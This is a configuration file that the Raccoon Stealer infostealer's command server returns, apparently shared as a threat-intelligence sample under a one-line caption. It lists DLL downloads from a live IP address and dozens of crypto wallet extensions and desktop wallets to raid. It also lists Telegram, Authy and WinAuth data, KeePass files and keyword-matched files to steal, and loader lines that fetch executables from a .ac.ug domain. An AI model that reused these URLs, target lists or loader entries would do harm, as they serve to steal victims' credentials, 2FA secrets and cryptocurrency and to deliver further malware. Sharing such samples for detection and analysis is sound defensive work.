example of a configuration returned by a Raccoon Stealer C2

configuration.txt

libs_nss3:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
libs_msvcp140:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
libs_vcruntime140:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
libs_mozglue:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
libs_freebl3:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
libs_softokn3:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
ews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings
ews_tronl:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings
libs_sqlite3:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
ews_bsc:fhbohimaelbohpjbbldcngcnapndodjp;BinanceChain;Local Extension Settings
ews_ronin:fnjhmkhhmkbjkkabndcnnogagogbneec;Ronin;Local Extension Settings
wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
wlts_atomic:Atomic;26;atomic;*;*cache*,*IndexedDB*
wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
wlts_binance:Binance;26;Binance;*app-store.*;-
wlts_coinomi:Coinomi;28;Coinomi\Coinomi\wallets;*;-
wlts_electrum:Electrum;26;Electrum\wallets;*;-
wlts_elecltc:Electrum-LTC;26;Electrum-LTC\wallets;*;-
wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
wlts_guarda:Guarda;26;Guarda;*;*cache*,*IndexedDB*
wlts_green:BlockstreamGreen;28;Blockstream\Green;*;cache,gdk,*logs*
wlts_ledger:Ledger Live;26;Ledger Live;*;*cache*,*dictionar*,*sqlite*
ews_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings
ews_meta:nkbihfbeogaeaoehlefnkodbefgpgknn;MetaMask;Local Extension Settings
sstmnfo_System Info.txt:System Information: 
|Installed applications:
|
libs_nssdbm3:http://193.106.191.146/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll
wlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*
wlts_mymonero:MyMonero;26;MyMonero;*;*cache*
wlts_xmr:Monero;5;Monero\\wallets;*.keys;-
wlts_wasabi:Wasabi;26;WalletWasabi\\Client;*;*tor*,*log*
ews_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings
ews_xdefi:hmeobnfnfcmdkdcmlblgagmfpfboieaf;XDEFI;IndexedDB
ews_waveskeeper:lpilbniiabackdjcionkobglmddfbcjo;WavesKeeper;Local Extension Settings
ews_solflare:bhhhlbepdkbapadjdnnojkbgioiodbic;Solflare;Local Extension Settings
ews_rabby:acmacodkjbdgmoleebolmdjonilkdbch;Rabby;Local Extension Settings
ews_cyano:dkdedlpgdmmkkfjabffeganieamfklkm;CyanoWallet;Local Extension Settings
ews_coinbase:hnfanknocfeofbddgcijnmhnfnkdnaad;Coinbase;IndexedDB
ews_auromina:cnmamaachppnkjgnildpdmkaakejnhae;AuroWallet;Local Extension Settings
ews_khc:hcflpincpppdclinealmandijcmnkbgn;KHC;Local Extension Settings
ews_tezbox:mnfifefkajgofkcjkemidiaecocnkjeh;TezBox;Local Extension Settings
ews_coin98:aeachknmefphepccionboohckonoeemg;Coin98;Local Extension Settings
ews_temple:ookjlbkiijinhpmnjffcofjonbfbgaoc;Temple;Local Extension Settings
ews_iconex:flpiciilemghbmfalicajoolhkkenfel;ICONex;Local Extension Settings
ews_sollet:fhmfendgdocmcbmfikdcogofphimnkno;Sollet;Local Extension Settings
ews_clover:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings
ews_polymesh:jojhfeoedkpkglbfimdfabpdfjaoolaf;PolymeshWallet;Local Extension Settings
ews_neoline:cphhlgmgameodnhkjdmkpanlelnlohao;NeoLine;Local Extension Settings
ews_keplr:dmkamcknogkgcdfhhbddcghachkejeap;Keplr;Local Extension Settings
ews_terra_e:ajkhoeiiokighlmdnlakpjfoobnjinie;TerraStation;Local Extension Settings
ews_terra:aiifbnbfobpmeekipheeijimdpnlpgpp;TerraStation;Local Extension Settings
ews_liquality:kpfopkelmapcoipemfendmdcghnegimn;Liquality;Local Extension Settings
ews_saturn:nkddgncdjgjfcddamfgcmfnlhccnimig;SaturnWallet;Local Extension Settings
ews_guild:nanjmdknhkinifnkgdcggcfnhdaammmj;GuildWallet;Local Extension Settings
ews_phantom:bfnaelmomeimhlpmgjnjophhpkkoljpa;Phantom;Local Extension Settings
ews_tronlink:ibnejdfjmmkpcnlpebklmnkoeoihofec;TronLink;Local Extension Settings
ews_brave:odbfpeeihdkbihmopkbjmoonfanlbfcl;Brave;Local Extension Settings
ews_meta_e:ejbalbakoplchlghecdalmeeeajnimhm;MetaMask;Local Extension Settings
ews_ronin_e:kjmoohlgokccodicjjfebfomlbljgfhk;Ronin;Local Extension Settings
ews_mewcx:nlbmnnijcnlegkjjpcfjclmcfggfefdm;MEW_CX;Sync Extension Settings
ews_ton:cgeeodpfagjceefieflmdfphplkenlfk;TON;Local Extension Settings
ews_goby:jnkelfanjkeadonecabehalmbgpfodjm;Goby;Local Extension Settings
ews_ton_ex:nphplpgoakhhjchkkhmiggakijnkhfnd;TON;Local Extension Settings
ews_Cosmostation:fpkhgmpbidmiogeglndfbkegfdlnajnf;Cosmostation;Local Extension Settings
ews_bitkeep:jiidiaalihmmhddjgbnbgdfflelocpak;BitKeep;Local Extension Settings
ews_gamestopext:pkkjjapmlcncipeecdmlhaipahfdphkd;GameStop;Local Extension Settings
ews_stargazer:pgiaagfkgcbnmiiolekcfmljdagdhlcm;Stargazer;Local Extension Settings
ews_clv:nhnkbkgjikgcigadomkphalanndcapjk;CloverWallet;Local Extension Settings
ews_jaxxlibertyext:cjelfplplebdjjenllpjcblmjkfcffne;JaxxLibertyExtension;Local Extension Settings
scrnsht_Screenshot.jpeg:1
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*
grbr_DESKTOPtxt:%USERPROFILE%\Desktop|*.txt|-|100|1|0|files
grbr_Recent:%userprofile%\AppData\Roaming\Microsoft\Windows\Recent|*.doc*,*.txt,*.xls|*recycle*,*windows*|1024|0|1|files
grbr_Authy:%userprofile%\AppData\Roaming\Authy Desktop\Local Storage\leveldb|*MANIFEST*,*.ldb,*log*,*lock*,*.txt,*current*,|*recycle*,*windows*|1024|0|0|files
grbr_Winauth:%userprofile%\AppData\Roaming\WinAuth|*.xml,*winauth*,|*recycle*,*windows*|1024|0|0|files
grbr_KdbxAxxUtc:%USERPROFILE%|*.kdbx,*.axx,*UTC--*|*recycle*,*windows*|1024|1|0|files
grbr_Desktopfiles:%USERPROFILE%\Desktop|*password*,*wallet*,*seed*,*bitcoin*,*key*,*2fa*,*crypto*,*coin*,*private*,*mnemonic*,*trezor*,*blockchain*,*krypto*,*exodus*,*jaxx*,*electrum*,*guarda*,*authenticator*,*metamask*,*binance*,*bitstamp*,*bitfinex*,*gdax*,*bitmex*,*blockchain*,*btcmarket*,*bitpay*,*bitpanda*,*bittrex*,*bitrex*,*bithumb*,*kucoin*,*huobi*,*poloniex*,*kraken*,*okex*,*hitbtc*,*bitflyer*,*ftx*,*bitmart*,*solana*|*recycle*,*windows*|1024|1|0|files
grbr_Documentsfiles:%USERPROFILE%\Documents|*password*,*wallet*,*seed*,*bitcoin*,*key*,*2fa*,*crypto*,*coin*,*private*,*mnemonic*,*trezor*,*blockchain*,*krypto*,*exodus*,*jaxx*,*electrum*,*guarda*,*authenticator*,*metamask*,*binance*,*bitstamp*,*bitfinex*,*gdax*,*bitmex*,*blockchain*,*btcmarket*,*bitpay*,*bitpanda*,*bittrex*,*bitrex*,*bithumb*,*kucoin*,*huobi*,*poloniex*,*kraken*,*okex*,*hitbtc*,*bitflyer*,*ftx*,*bitmart*,*solana*|*recycle*,*windows*|1024|1|0|files
grbr_Downloadsfiles:%USERPROFILE%\Downloads|*password*,*wallet*,*seed*,*bitcoin*,*key*,*2fa*,*crypto*,*coin*,*private*,*mnemonic*,*trezor*,*blockchain*,*krypto*,*exodus*,*jaxx*,*electrum*,*guarda*,*authenticator*,*metamask*,*binance*,*bitstamp*,*bitfinex*,*gdax*,*bitmex*,*blockchain*,*btcmarket*,*bitpay*,*bitpanda*,*bittrex*,*bitrex*,*bithumb*,*kucoin*,*huobi*,*poloniex*,*kraken*,*okex*,*hitbtc*,*bitflyer*,*ftx*,*bitmart*,*solana*|*recycle*,*windows*|1024|1|0|files
grbr_Pictures:%USERPROFILE%\Pictures|*password*,*wallet*,*seed*,*bitcoin*,*key*,*2fa*,*crypto*,*coin*,*private*,*mnemonic*,*trezor*,*blockchain*,*krypto*,*exodus*,*jaxx*,*electrum*,*guarda*,*authenticator*,*metamask*,*binance*,*bitstamp*,*bitfinex*,*gdax*,*bitmex*,*blockchain*,*btcmarket*,*bitpay*,*bitpanda*,*bittrex*,*bitrex*,*bithumb*,*kucoin*,*huobi*,*poloniex*,*kraken*,*okex*,*hitbtc*,*bitflyer*,*ftx*,*bitmart*,*solana*|*recycle*,*windows*|1024|1|0|files
ldr_1:http://wiwirdo.ac.ug/azne.exe|%TEMP%\|exe
ldr_1:http://wiwirdo.ac.ug/pm.exe|%TEMP%\|exe
ldr_1:http://wiwirdo.ac.ug/cc.exe|%TEMP%\|exe
ldr_1:http://wiwirdo.ac.ug/rc.exe|%TEMP%\|exe
token:fd734448ccae32cb1401058775f4a54c